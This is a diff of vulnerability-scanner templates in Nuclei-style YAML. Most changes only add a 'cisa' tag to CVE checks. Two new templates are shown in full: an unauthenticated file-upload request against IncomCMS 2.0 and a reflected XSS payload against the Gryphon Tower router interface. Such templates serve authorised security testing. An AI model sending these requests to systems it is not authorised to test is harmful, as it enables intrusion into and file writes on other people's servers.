cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-14882
tags: cve,cve2020,oracle,rce,weblogic,oast
tags: cve,cve2020,oracle,rce,weblogic,oast,cisa
requests:
- method: GET

View File

@ -14,7 +14,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-14883
tags: cve,cve2020,oracle,rce,weblogic
tags: cve,cve2020,oracle,rce,weblogic,cisa
requests:
- raw:

View File

@ -20,7 +20,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-15505
tags: cve,cve2020,mobileiron,rce,sentry
tags: cve,cve2020,mobileiron,rce,sentry,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-16846
cwe-id: CWE-78
tags: cve,cve2020,saltstack
tags: cve,cve2020,saltstack,cisa
requests:
- method: POST

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-17496
cwe-id: CWE-74
tags: cve,cve2020,vbulletin,rce
tags: cve,cve2020,vbulletin,rce,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-17530
cwe-id: CWE-917
tags: cve,cve2020,apache,rce,struts
tags: cve,cve2020,apache,rce,struts,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-1938
cwe-id: CWE-269
tags: cve,cve2020,apache,tomcat,lfi,network
tags: cve,cve2020,apache,tomcat,lfi,network,cisa
network:
- inputs:

View File

@ -17,7 +17,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-25213
cwe-id: CWE-434
tags: cve,cve2020,wordpress,rce
tags: cve,cve2020,wordpress,rce,cisa
requests:
- raw:

View File

@ -14,7 +14,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-25223
tags: cve,cve2020,sophos,rce,oast,unauth
tags: cve,cve2020,sophos,rce,oast,unauth,cisa
requests:
- raw:

View File

@ -14,7 +14,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-25506
cwe-id: CWE-78
tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router
tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,cisa
requests:
- raw:

View File

@ -14,7 +14,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-26919
tags: cve,cve2020,netgear,rce,oast,router,unauth
tags: cve,cve2020,netgear,rce,oast,router,unauth,cisa
requests:
- raw:

View File

@ -0,0 +1,45 @@
id: CVE-2020-29597
info:
name: IncomCMS 2.0 - Arbitary files upload
author: princechaddha
severity: critical
description: |
IncomCMS 2.0 has a modules/uploader/showcase/script.php insecure file upload vulnerability. This vulnerability allows unauthenticated attackers to upload files into the server.
reference:
- https://github.com/Trhackno/CVE-2020-29597
- https://nvd.nist.gov/vuln/detail/CVE-2020-29597
- https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
- https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29597
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2020,incomcms,fileupload,intrusive
requests:
- raw:
- |
POST /incom/modules/uploader/showcase/script.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
------WebKitFormBoundaryBEJZt0IK73M2mAbt
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png"
Content-Type: image/png
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
- |
GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, '\"name\":\"{{randstr}}.png\"')
- status_code_2 == 200
condition: and

View File

@ -18,7 +18,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-3452
cwe-id: CWE-20
tags: cve,cve2020,cisco,lfi
tags: cve,cve2020,cisco,lfi,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-3580
cwe-id: CWE-79
tags: cve,cve2020,xss,cisco
tags: cve,cve2020,xss,cisco,cisa
requests:
- raw:

View File

@ -13,7 +13,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-5410
cwe-id: CWE-22
tags: cve,cve2020,lfi,springcloud,config,traversal
tags: cve,cve2020,lfi,springcloud,config,traversal,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-5847
cwe-id: CWE-94,CWE-668
tags: cve,cve2020,rce
tags: cve,cve2020,rce,cisa
requests:
- method: GET

View File

@ -23,7 +23,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-5902
cwe-id: CWE-22,CWE-829
tags: cve,cve2020,bigip,rce
tags: cve,cve2020,bigip,rce,cisa
requests:
- method: GET

View File

@ -18,7 +18,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-6207
cwe-id: CWE-306
tags: cve,cve2020,sap,solman,rce
tags: cve,cve2020,sap,solman,rce,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 10
cve-id: CVE-2020-6287
cwe-id: CWE-306
tags: cve,cve2020,sap
tags: cve,cve2020,sap,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-7247
cwe-id: CWE-78,CWE-755
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,cisa
network:
- inputs:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-7961
cwe-id: CWE-502
tags: cve,cve2020,rce,liferay
tags: cve,cve2020,rce,liferay,cisa
requests:
- raw:

View File

@ -14,7 +14,7 @@ info:
cvss-score: 6.5
cve-id: CVE-2020-8193
cwe-id: CWE-862
tags: cve,cve2020,citrix,lfi
tags: cve,cve2020,citrix,lfi,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-8515
cwe-id: CWE-78
tags: cve,cve2020,rce
tags: cve,cve2020,rce,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-9054
cwe-id: CWE-78
tags: cve,cve2020,rce,zyxel,injection
tags: cve,cve2020,rce,zyxel,injection,cisa
requests:
- method: GET

View File

@ -18,7 +18,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-1497
cwe-id: CWE-78
tags: cve,cve2021,cisco,rce,oast
tags: cve,cve2021,cisco,rce,oast,cisa
requests:
- raw:

View File

@ -18,7 +18,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-1498
cwe-id: CWE-78
tags: cve,cve2021,cisco,rce,oast,mirai
tags: cve,cve2021,cisco,rce,oast,mirai,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-20090
cwe-id: CWE-22
tags: cve,cve2021,lfi,buffalo,firmware,iot
tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa
requests:
- raw:

View File

@ -0,0 +1,40 @@
id: CVE-2021-20137
info:
name: Gryphon Tower - Reflected XSS
author: edoardottt
severity: medium
description: A reflected cross-site scripting vulnerability exists in the url parameter of the /cgi-bin/luci/site_access/ page on the Gryphon Tower router's web interface. An attacker could exploit this issue by tricking a user into following a specially crafted link, granting the attacker javascript execution in the context of the victim's browser.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-20137
cwe-id: CWE-79
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20137
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137
- https://www.tenable.com/security/research/tra-2021-51
tags: cve,cve2021,gryphon,xss
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- 'onfocus=alert(document.domain) autofocus=1>'
- 'Send Access Request URL'
condition: and

View File

@ -15,7 +15,7 @@ info:
cvss-score: 7.8
cve-id: CVE-2021-21315
cwe-id: CWE-78
tags: nodejs,cve,cve2021
tags: nodejs,cve,cve2021,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-21972
cwe-id: CWE-269
tags: cve,cve2021,vmware,rce,vcenter
tags: cve,cve2021,vmware,rce,vcenter,cisa
requests:
- method: GET

Some files were not shown because too many files have changed in this diff Show More